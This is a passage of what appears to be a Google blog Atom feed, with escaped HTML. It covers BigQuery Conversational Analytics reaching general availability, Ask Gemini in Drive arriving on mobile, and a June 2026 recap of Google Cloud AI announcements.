      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_py2cIpy.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;“At MoneySuperMarket, BigQuery Conversational Analytics has changed how our teams get to insight. Analysis that used to take weeks can now be done in minutes, saving our financial analysts around half a day each week. By making analysis more self-serve, we’re helping teams create faster insight to support better product and commercial decision-making.”&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; - Suzie Millar, Head of Data, Mony Group&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Engineered trust and explainability&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Accuracy in Conversational Analytics is by design, not aspirational: every agent is grounded in your business context, not a model's assumptions. That context comes from the&lt;/span&gt; &lt;a href="https://cloud.google.com/blog/products/data-analytics/introducing-the-google-cloud-knowledge-catalog"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Knowledge Catalog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (glossaries, profile scans, and context bundles), BigQuery Graph for multi-hop queries, and your own verified queries and custom agent instructions. With the new&lt;/span&gt; &lt;a href="https://cloud.google.com/blog/products/data-analytics/how-the-open-knowledge-format-can-improve-data-sharing"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Open Knowledge Format&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, the wiki your team already maintains can feed straight into Knowledge Catalog. At query time, Conversational Analytics leverages existing embeddings of your column values, generated by AI.GENERATE_EMBEDDINGS, to match your question to the right data, so asking about "Texas" finds rows stored as "TX." &lt;/span&gt;&lt;/p&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Grounding only earns trust if the user can see it. So every answer is inspectable, providing:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Visible thinking steps:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Review the agent's step-by-step reasoning and the exact SQL it generates before it returns an answer.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Context citations:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; See the precise sources behind every response, including tables, schema definitions, verified queries, and glossary terms used to calculate it.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Proactive disambiguation: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;When a prompt is vague, the agent asks targeted clarifying questions instead of guessing.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Long-term memory: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;The agent remembers what your terms and questions mean, so you don't have to disambiguate the same thing twice.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="3" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/3_z93CR8B.gif" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Fig 2. Generating answers that you can trust&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Security and governance by design&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;One common barrier to scaling AI is governance. Reaching tens of thousands of users requires rigorous security, governance, and transparent&lt;/span&gt; &lt;a href="https://docs.cloud.google.com/gemini/data-agents/conversational-analytics-api/manage-costs"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;cost controls&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Conversational Analytics inherits BigQuery's governance model, so users only query data they are authorized to see and every query is logged for auditing within the BigQuery compliance framework. On top of that baseline, it supports &lt;/span&gt;&lt;a href="https://cloud.google.com/security/products/access-transparency?hl=en"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Access Transparency (AxT)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kms/docs/cmek"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Customer-Managed Encryption Keys (CMEK)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/vpc/docs/private-google-access"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Private IP&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/vpc/docs"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;VPC Service Controls&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and now guarantees &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/assured-workloads/docs/data-residency"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;data residency&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for data at rest and for ML processing within EU and US multi-region endpoints. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For your most engaged users, we also deliver the operational controls that scale demands: Configure Google Cloud-native cost controls so no user or project exceeds its allotment, cap an agent's maximum query size in bytes, and track usage through BigQuery labels on jobs.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="4" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/4_IR0rdmb.gif" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Fig 3. Agent Observability and Monitoring&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The power of BigQuery AI, in plain language&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The agent doesn't just retrieve rows, but calls BigQuery's AI functions for you, turning advanced analysis into a question you can ask in plain language.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Find the "why," not just the "what": &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Ask what drove a change and the agent runs root-cause analysis with &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;AI.KEY_DRIVERS&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, surfacing the exact segments behind the move.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;See what's coming: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Move past historical reporting by triggering &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;AI.FORECAST&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;AI.DETECT_ANOMALIES&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; right in the chat to project trends and flag outliers, with no model to build or manage.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Query your entire data estate: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;With object tables, the agent reasons over relational data and unstructured files together, PDFs, images, logs, and video, so a single conversation spans your whole estate.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="5" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/5_UJkt6D1.gif" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Fig 4. Conversational Analytics leverages BigQuery AI functions&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;From answering questions to running the investigation&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Conversational Analytics agents are moving from human-scale reactive analysis to agent-scale proactive action. You're no longer limited to asking a question and waiting for the answer.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Deep-dive mode: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;If you ask ‘Why a metric moved?’ the agent will build its own analytical plan, mapping the critical questions, working through a full multi-step investigation with no manual SQL, and minimizing analytical blind spots. The result is a comprehensive report you can download and share.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="8" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/8_JyNVoor.gif" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Fig 5. Deep Dive mode in Conversational Analytics&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Agentic workflows: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy autonomous agents that monitor your data, reason over events, run multi-step workflows on a schedule, and deliver insights straight to your chat. You can set up a Monday-morning business report or daily anomaly detection across key metrics, each with a custom directive so they investigate only what you care about.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="9" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/9_S5opsaC.gif" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Fig 6. Scheduling Conversational Analytics agent workflows&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Start talking to your data today&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;General availability of Conversational Analytics in BigQuery marks an official exit from the static dashboard era. By embedding Gemini’s deep cognitive reasoning directly into the data warehouse, we are enabling a self-managing environment that transforms raw data into active, corporate knowledge. This delivery is a key component of the Agentic Data Cloud, providing a true system of action that moves past retrospective reporting, incorporates security and governance by design and is engineered for enterprise trust.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you are ready to get started, learn more from our &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/conversational-analytics"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, reach out to your Google Cloud account representative, or get started in &lt;/span&gt;&lt;a href="https://console.cloud.google.com/bigquery"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; today to build and deploy your first agent.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/data-analytics/conversational-analytics-in-bigquery-now-ga" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-30T18:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/ask-gemini-in-drive-now-available-on-mobile.html</id>
    <title>Ask Gemini in Drive now available on mobile</title>
    <updated>2026-06-30T17:40:51+00:00</updated>
    <content type="html">&lt;p&gt;In April, we announced the &lt;a href="https://workspaceupdates.googleblog.com/2026/04/ask-gemini-in-drive-now-generally-available.html" target="_blank"&gt;general availability of Ask Gemini in Drive&lt;/a&gt; on the web. We’re now bringing this feature to the Drive Android and iOS apps.&lt;/p&gt;&lt;p&gt;Ask Gemini in Drive offers you a dedicated, immersive workspace designed for deep focus. You can now engage in high-context, multi-turn conversations to efficiently explore and understand content across Drive, other Workspace apps, and the web.&lt;/p&gt;&lt;p&gt;Key features include:&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Dedicated conversations: &lt;/b&gt;Engage in focused discussions about specific sets of files and folders. By grounding your questions in the relevant content, you get more precise, actionable answers.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Persistent conversation history:&lt;/b&gt; Easily pick up where you left off. Your past chats are saved, allowing you to quickly revisit previous insights about specific folders or projects without starting over.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Secure and compliant: &lt;/b&gt;Ask Gemini in Drive is built directly into the Drive architecture, it never copies or replicates your files. It honors your existing data protection and security controls, including access permissions, DLP policies, and IRM, ensuring Gemini only accesses content you are authorized to see.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;This feature will roll out in English and an &lt;a href="https://support.google.com/docs/answer/14925782#zippy=%2Cgemini-in-drive-side-panel" target="_blank"&gt;additional 28 languages&lt;/a&gt; over the next several weeks.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;This feature is available by default if &lt;a href="https://knowledge.workspace.google.com/admin/gemini/manage-access-to-gemini-features-in-workspace-services" target="_blank"&gt;Gemini for Workspace in Drive is enabled&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;You must have &lt;a href="https://support.google.com/mail/answer/15604322?sjid=17363988672514456782-NA#gw&amp;amp;zippy=%2Csmart-features-in-google-workspace%2Cwhat-are-googles-legal-bases-of-processing-for-users-in-the-european-economic-area-united-kingdom-or-switzerland%2Chow-long-is-your-workspace-content-activity-used-to-provide-smart-features-and-to-improve-these-features" target="_blank"&gt;Workspace smart features&lt;/a&gt; enabled to use Ask Gemini in Drive. Visit the Help Center to &lt;a href="https://support.google.com/drive/answer/16963068?hl=en&amp;amp;ref_topic=15113879&amp;amp;sjid=14051016379905367535-NA#ask_gemini_in_drive" target="_blank"&gt;learn more about Ask Gemini in Drive&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid and Scheduled Release domains:&lt;/a&gt; Extended rollout (potentially longer than 15 days for feature visibility) started on June 26, 2026&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business: &lt;/b&gt;Business Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise: &lt;/b&gt;Enterprise Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Consumer: &lt;/b&gt;Google AI Pro and Ultra&lt;/li&gt;&lt;li&gt;&lt;b&gt;AI Add-ons: &lt;/b&gt;Google AI Pro for Education&lt;/li&gt;&lt;/ul&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Drive Help: &lt;a href="https://support.google.com/drive/answer/16963068" target="_blank"&gt;Use Gemini in Drive for research &amp;amp; analysis&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/ask-gemini-in-drive-now-available-on-mobile.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-30T17:40:51+00:00</published>
  </entry>
  <entry>
    <id>https://research.google/blog/expanding-our-heat-resilience-data-to-50-global-cities</id>
    <title>Expanding our Heat Resilience data to 50+ global cities</title>
    <updated>2026-06-30T17:03:10+00:00</updated>
    <content type="html">Climate &amp; Sustainability</content>
    <link href="https://research.google/blog/expanding-our-heat-resilience-data-to-50-global-cities" rel="alternate"/>
    <category term="Google Research"/>
    <published>2026-06-30T17:03:10+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/outreach-and-initiatives/sustainability/2026-environmental-report</id>
    <title>Read our 11th annual Environmental Report</title>
    <updated>2026-06-30T16:05:00+00:00</updated>
    <content type="html">A collage of a landscape, a Google search for "sustainability", windmills, and Google Maps</content>
    <link href="https://blog.google/company-news/outreach-and-initiatives/sustainability/2026-environmental-report" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-30T16:05:00+00:00</published>
  </entry>
  <entry>
    <id>https://deepmind.google/blog/start-building-with-nano-banana-2-lite-and-gemini-omni-flash</id>
    <title>Start building with Nano Banana 2 Lite and Gemini Omni Flash</title>
    <updated>2026-06-30T16:02:40+00:00</updated>
    <link href="https://deepmind.google/blog/start-building-with-nano-banana-2-lite-and-gemini-omni-flash" rel="alternate"/>
    <category term="Google DeepMind"/>
    <published>2026-06-30T16:02:40+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/ai-machine-learning/what-google-cloud-announced-in-ai-this-month</id>
    <title>What Google Cloud announced in AI this month</title>
    <updated>2026-06-30T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph"&gt;&lt;p&gt;&lt;b&gt;&lt;i&gt;Editor’s note&lt;/i&gt;&lt;/b&gt;&lt;i&gt;: Want to keep up with the latest from Google Cloud? Check back here for a monthly recap of our latest updates, announcements, resources, events, learning opportunities, and more.&lt;/i&gt;&lt;/p&gt;&lt;hr /&gt;&lt;p&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our main focus in June was helping your teams build, scale, and secure AI. Today, we’re sharing a fresh roundup of updates designed to help you run smarter, more secure applications while keeping everything under your control. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We even shared a cool virtual shopping demo at Cannes to show how retailers can make product discovery more exciting. Let’s dive in! &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Top announcements&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/how-the-open-knowledge-format-can-improve-data-sharing?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Introducing the Open Knowledge Format&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: We introduced the Open Knowledge Format (OKF), an open specification that formalizes the LLM-wiki pattern into a portable, interoperable format. This is a vendor-neutral, agent- and human-friendly standard for representing the metadata, context, and curated knowledge that modern AI systems need.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/powering-the-next-era-of-confidential-ai?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Collaboration with Apple on its expanded Private Cloud Compute (PCC) systems&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: Our collaboration with Apple is built on a foundation of deep commitment to privacy that leverages Google Cloud's security and privacy technologies. At the heart of this collaboration is our Confidential Computing portfolio and our Titanium security architecture.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/cloud-fable-5-on-google-cloud?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Claude Fable 5: Available on Google Cloud: &lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;Claude Fable 5, Anthropic’s latest frontier model, is now generally available on Google Cloud. This launch is the latest proof point of our ongoing commitment to bring the industry's latest models straight to our Agent Platform. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/transform/gemini-enterprise-is-helping-restyle-the-retail-playbook?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Atelier: How Gemini Enterprise is helping restyle the retail playbook&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: This year at Cannes, we showcased Cloud Atelier — a destination-based, virtual shopping experience that highlights how retail brands can turn this classic dilemma into an exciting moment of product discovery. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Thought leadership (editor’s pick): &lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-how-google-cloud-security-uses-ai-internally?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;How Google Cloud Security uses AI internally&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: To counter machine-speed, AI-driven threats, we’ve worked hard to transition Google Cloud’s security posture to an autonomous, proactive model. By embedding specialized AI agents directly into our software development lifecycle (SDLC), we’ve created automated guardrails that protect code at a scale and speed unreachable by human teams — and we’re taking steps to make those same guardrails widely available.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-the-4-lessons-that-guided-ai-threat-defense?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;The 4 lessons that guided AI Threat Defense&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: We introduced Chris Betz as the new CISO of Google Cloud. For his first Cloud CISO Perspectives, Chris shares four key lessons we learned about using AI to the defender’s advantage while building AI Threat Defense.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;News you can use: &lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/transform/5-lessons-from-red-teaming-ai-applications?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;5 lessons from red teaming AI applications: &lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;To help you build AI securely, Mandiant has developed a proactive, risk-based approach centered on the Good AI Assessment (GAIA) Top 10, outlined in our new report, Secure Development of Generative AI Applications: A Proactive Approach. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/how-to-measure-the-business-value-of-generative-ai?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;How to unlock true ROI in software development – a deep dive into the latest DORA research: &lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;To help you evaluate the costs and business benefits of AI, we recently shared the DORA: ROI of AI-assisted software development report. This research offers a practical approach to help your team work through early adoption challenges, align engineering plans, and drive business growth.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/agent-factory-recap-100x-engineering-with-ai-agents-in-google-antigravity-20?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Factory Recap: 100X engineering with AI agents in Google Antigravity 2.0&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: In this episode of the Agent Factory, Shir Meir Lador, Head of AI Engineering, Google Cloud Developer Relations, sat down with Rody Davis, one of Google’s top agentic engineers. They dive into the massive shift from traditional IDEs to agent-first platforms, the reality of code reviews in an AI-driven world, and how to use "skills" to perform at a 100X level.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud customers, read our monthly recap, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/customers/cool-stuff-google-cloud-customers-built-monthly-round-up?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cool stuff customers built. &lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-aside"&gt;&lt;dl&gt;
    &lt;dt&gt;aside_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;title&amp;#x27;, &amp;#x27;$300 in free credit to try Google Cloud AI and ML&amp;#x27;), (&amp;#x27;body&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f2164786250&amp;gt;), (&amp;#x27;btn_text&amp;#x27;, &amp;#x27;Start building for free&amp;#x27;), (&amp;#x27;href&amp;#x27;, &amp;#x27;http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/&amp;#x27;), (&amp;#x27;image&amp;#x27;, None)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;hr /&gt;
&lt;h2 style="text-align: center;"&gt;&lt;span style="vertical-align: baseline;"&gt;May&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We’ve had a busy month! Between announcing Gemini Spark and Gemini 3.5 at Google I/O – and unveiling Google AI Threat Defense, our latest AI-powered cybersecurity solution, we had a lot to share with Google Cloud customers. Keeping up with the latest news takes time, so we gathered the most important announcements, thought leadership, and technical guides in one place to help you quickly catch up.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To learn more about our I/O announcements, here’s &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/innovations-from-google-io-26-on-google-cloud?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;everything you need to know&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for Google Cloud customers, and &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/startups/startup-news-from-io-and-what-it-means-to-founders?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;top news for startups&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
